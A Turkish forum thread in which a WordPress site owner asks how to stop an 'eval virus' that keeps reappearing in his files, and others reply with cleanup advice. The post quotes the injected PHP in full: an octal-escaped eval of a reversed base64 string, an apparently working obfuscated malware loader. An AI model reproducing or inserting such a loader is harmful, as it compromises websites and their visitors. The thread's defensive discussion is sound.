Wp Eval Virüsü

Bu virüs İllallah ettirdi beni Bilgisayarımı komple tarattım combofix ile felan ve dosyalarıdaki kodları tamamen temizledim. fakat dosya yı ftp ye attığımda otomatik olarak hemen bu lanet olası kod geliyor

<?php
eval("\145\166\141\154\050\142\141\163\145\066\064 \137\144\145\143\157\144\145\050\163\164\162\162\1 45\166\050'==QfgsDdphXZgsTKog2c1xmZgszJ+QHcpJ3Yz9C P+Iycq5SMucjLx0SeyVWdxp2Lt92YusmcvdXZtFmcm1SeyVWdx p2LvoDc0RHai0zYyNHI0BXayN2c8cCIvh2YlByegkSKddCVOV0 RB9lUFNVVfBFVUh0JbJVRWJVRT9FJABCLnk2cvUGbn92bnxHel RmbhlHfyVWehxGctwVYpRWZt1CXzd3bk5Wa3xHZh9Gbud3bkxH duFmdhxXYjlmcl1WY8h2cvRnbpNWYt9yJog2Y0FWbfdWZyBXIg YiJgkSKddiUFJVRGVkUfBFVUh0JbJVRWJVRT9FJABCLnk2cv0T c/wVb8h2YyFWZz12LngCajRXYt91ZlJHcgwHfgkSXnQlTFdUQfJV RTV1XQRFVIdyWSVkVSV0UfRCQgwyJpN3LlRne812bvhHfhRGe8 N3clxWZyl2d8N3biV2d8BXY3xXZu9mZhR2b2x3aulGbuwFc1xn clN3dvJnYuwFc1x3c1xWZ0xXZslmYv1WL0xnbhlmYtl3c8lnbv NHfl52boBHdyFWbzxXLll2c8Bnchh2c81WZnF2c8VmbvhGc8NH cpxWaoBHfjlmbvNXYuFGc81GbhBHfhl2av5GftMWZuxXYs9mcv R3btxXai9Wb8BXbtxHcklWb8lmbp1mLhJXZw9GfhZXYqxXZtJj a8R2bwlGfxFGcpxHZhBXa8VmbvhGcpxXZslmYv1WZpx3Y0hGfl 5WahxWZ89WbvN2bkxHdlt2YpJ3Y8xGblNGfx5WZixXeyJXZit2 YhxmY892Z05WY2FGfkl2byRmbhxXav1WY8xWZ0F2YsF2LngCaj RXYt91ZlJHcgwHfgkSXnQFUFN0QB9FUURFSnslUFZlUFN1XkAE IscSaz9Cbth3KcxWb0hGeuAXY35CZuZ3Lc52bpRXYjlGbwBXY8 xWb35CchdnLk5mdvwFd4VGdvcCKoNGdh12XnVmcwhCKgYWa'\0 51\051\051\073");
?>

bundan kurtulmanın başka bir yolu varmıdır acaba ?

yeni dosyalarla değiştir ftp den
tüm ftp şireflerini değiş
ftp programını sil pcden
adam gibi taratma yap
temalarıda kontrol et.

belki bu makale işini göre bilir ama benim tavsiyem direk olarak sunucuyla alakalı sunucuda barınan diğer sitelerden bulaşma olanağı çok yüksek Iframe virüsu sitenizin kodları arasına yerleştirilen kod parçacığıdır. Bu kod ile siteniz üzerinden kötü amaçlı program, reklam vs. ziyaretçilerin bilgisayarına yüklemeye çalışıyor vb. uygulamalar içinde bulunabiliyor. Bu durum arama motoru devlerinden olan google tarafından sitenizin filtreye girmesine ve ziyaretçi kaybetmenize yol açıyor. Peki Iframe virüsünü temizleme işlemini nasıl yapıcaz, nasıl bir yol izlemeliyiz, nelere dikkat etmeliyiz.

Iframe virüsü wordpress sitenize siz tarafından bulaşıyor. Bilgisayarınızda bulunan malware vb. virüsler tarafından siteniz ftp’sine bağlandığınızda kendi kodlarını otomatik olarak yerleştiriyor. Genelde tema dosyaları içerisine ve htaccess gibi dosyalara yerleştiriyor. Özelliklede siz sitenizde nekadar güvenlik önlemi alsanızda dosyalarınıza yazım izni (CMOD) vermesenizde bu durum gerçekleşebiliyor.

WordPress sitenizde ıframe virüslerini temizleyebilmek için öncelikle bilgisayarınızı virüslerden temizlemeniz gerek bunun için karspersky virüs programı çok başarılı bilgisayarınızda detaylı bir tarama yapın ve bilgisayarınızı güvenliği olduğundan eminseniz ftpnize bağlanın sitenize ait tüm dosyalarınızı indirin ve tekrar bir taramadan geçirin. Sonuç temiz çıktı ise birde kodlama bilginiz var ise eğer tema dosyalarınıza eklenti dosyalarına htaccess vs. dosyaların kodlarını inceleyin özellikle içerisinde base64 ile şifrelenmiş kodlar bulursanız silin wordpress hiçbir kodunu şifreleme yapmaz. Ayrıca sitenizden başka bir siteye yönlendirme uygulanıyorsa bunlarda zararlı kodlardır

yazının kaynağı

Virüs .htaccess dosyasına bulaşmış sonunda buldum.

genede tedbiri elden bırakma derim sen bilgisayarını gene temiz tutmaya çalış genelde bu tür virusler tekrarlar kendini yani asl sorun sensin ftp'ye bağlandığında otomatik kodlarını dosyalara yapıştırıyor bende bu sorunu çok yaşadım çözümü sunucuyu değiştirmekle buldum sunucuyu kullanan diğer sitelerden bulaşıyordu benim siteye